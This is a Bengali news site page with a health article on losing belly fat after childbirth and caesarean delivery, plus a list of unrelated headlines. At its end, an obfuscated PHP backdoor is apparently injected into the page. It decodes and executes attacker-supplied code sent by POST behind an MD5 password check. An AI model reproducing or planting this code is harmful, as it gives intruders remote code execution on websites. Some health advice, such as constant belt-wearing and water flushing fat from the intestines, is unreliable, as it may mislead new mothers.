শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

মা হওয়ার পর পেটের মেদ যেভাবে কমাবেন

photo-1465711599স্বাস্থ্য ডেস্ক : সন্তান জন্ম দেওয়া একজন নারীর জীবনে অনেক কঠিন বিষয়। গর্ভধারণের পর মায়ের ওজন এত সহজে কমে না। বিশেষ করে সিজারিয়ান হলে পেটের মেদ কমিয়ে আগের অবস্থায় নিয়ে আসতে অনেক সময় লাগে।

বেশির ভাগ নারীই তাঁদের এই পরিবর্তিত অবস্থা নিয়েই জীবন অতিবাহিত করেন। কারণ, তাঁরা বিশ্বাসই করতে পারেন না যে এই সাময়িক পরিবর্ধিত পেট কমানো সম্ভব। সিজারের পরে কিছু নিয়ম পালন করলে পাকস্থলী আবার ঠিক হতে পারে।

তবে যেকোনো ধরনের পেটের মেদ কমানো খুব সহজ নয় এবং সিজার করলে অবস্থাটা আরো বেশি কঠিন হয়ে যায়। কারণ, তখন স্ট্যান্ডার্ড অ্যাবডমিনাল এক্সারসাইজ করা যায় না। তবে বিকল্প উপায়ে সিজারিয়ান-পরবর্তী পেটের মেদ কমানো যায়। আসুন জেনে নেই কিছু বিষয় :

১. সি সেকশনের পরে ওজন কমানোর সবচেয়ে ভালো উপায় হচ্ছে বাচ্চাকে বুকের দুধ পান করানো। বাচ্চাকে ছয় মাস শুধু বুকের দুধ খাওয়াতে হবে। এর সাহায্যে আপনার পেটের অতিরিক্ত মেদ কমে যাবে।

২. প্রসবের পরে প্রথম ছয় মাস অত্যন্ত গুরুত্বপূর্ণ। এ সময়ে প্রেগন্যান্সি হরমোন পরিভ্রমণ করে এবং শরীরের সব চর্বি ঢিলেঢালা থাকে। এই চর্বি ঘনীভূত হয়ে জমাট বেঁধে গেলে ওজন কমানোটা বেশ কঠিন হয়ে যায়। সাধারণ কিছু ব্যায়াম শুরু করুন, যেমন—হাঁটা।

৩. পেটের মেদ কমাতে চাইলে আপনাকে শুধু খাওয়া, ঘুমানো ও ওয়াশরুমে যাওয়ার সময় ছাড়া সর্বক্ষণ পেটের বেল্ট পরে থাকতে হবে। এটা অনেক বিরক্তিকর হলেও আপনি অবশ্যই ভালো ফল পাবেন।

৪. সি সেকশনের পরে পেটের মেদ কমানোর ভালো উপায় হচ্ছে প্রাণায়াম করা। এতে পেটের মাংসপেশি দৃঢ় হয়।

৫. পানি শরীরের তরলের ভারসাম্য রক্ষা করে। আপনি হয়তো অবাক হবেন এটা শুনে যে, পানি অন্ত্র থেকে অতিরিক্ত মেদ বের করে দিতে সাহায্য করে। তাই প্রতিদিন পর্যাপ্ত পানি পান করুন। এতে ক্ষুধা কম লাগবে ও পেট ভরা থাকবে।

৬. বাচ্চাকে দুধ দিলে বাড়তি শক্তির জন্য কার্বোহাইড্রেট প্রয়োজন। এ ছাড়া প্রোটিন, ফল ও সবজি খেতে হবে। তবে ঘি, মাখন ও মিষ্টি খাওয়া থেকে বিরত থাকুন।

৭. স্বাস্থ্যকর খাবার খেলে খাওয়ার জন্য তীব্র আকাঙ্ক্ষা জন্মাবে না। তাই স্বাস্থ্যকর খাবার খান। তাই বলে অনাহারে থাকবেন না। এটা আপনার ও আপনার বাচ্চার জন্য ক্ষতির কারণ হবে।

সিজারিয়ান অপারেশনের পরে কিছুদিন ভারী ব্যায়াম করতে পারবেন না। তাই বলে আগের অবস্থা ফিরে পাবেন না ভেবে হতাশ হবেন না। ধৈর্য ধরুন। বিষয়টি ইতিবাচকভাবে নিন এবং চেষ্টা করুন। আপনি অবশ্যই পেটের মেদ কমাতে পারবেন।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}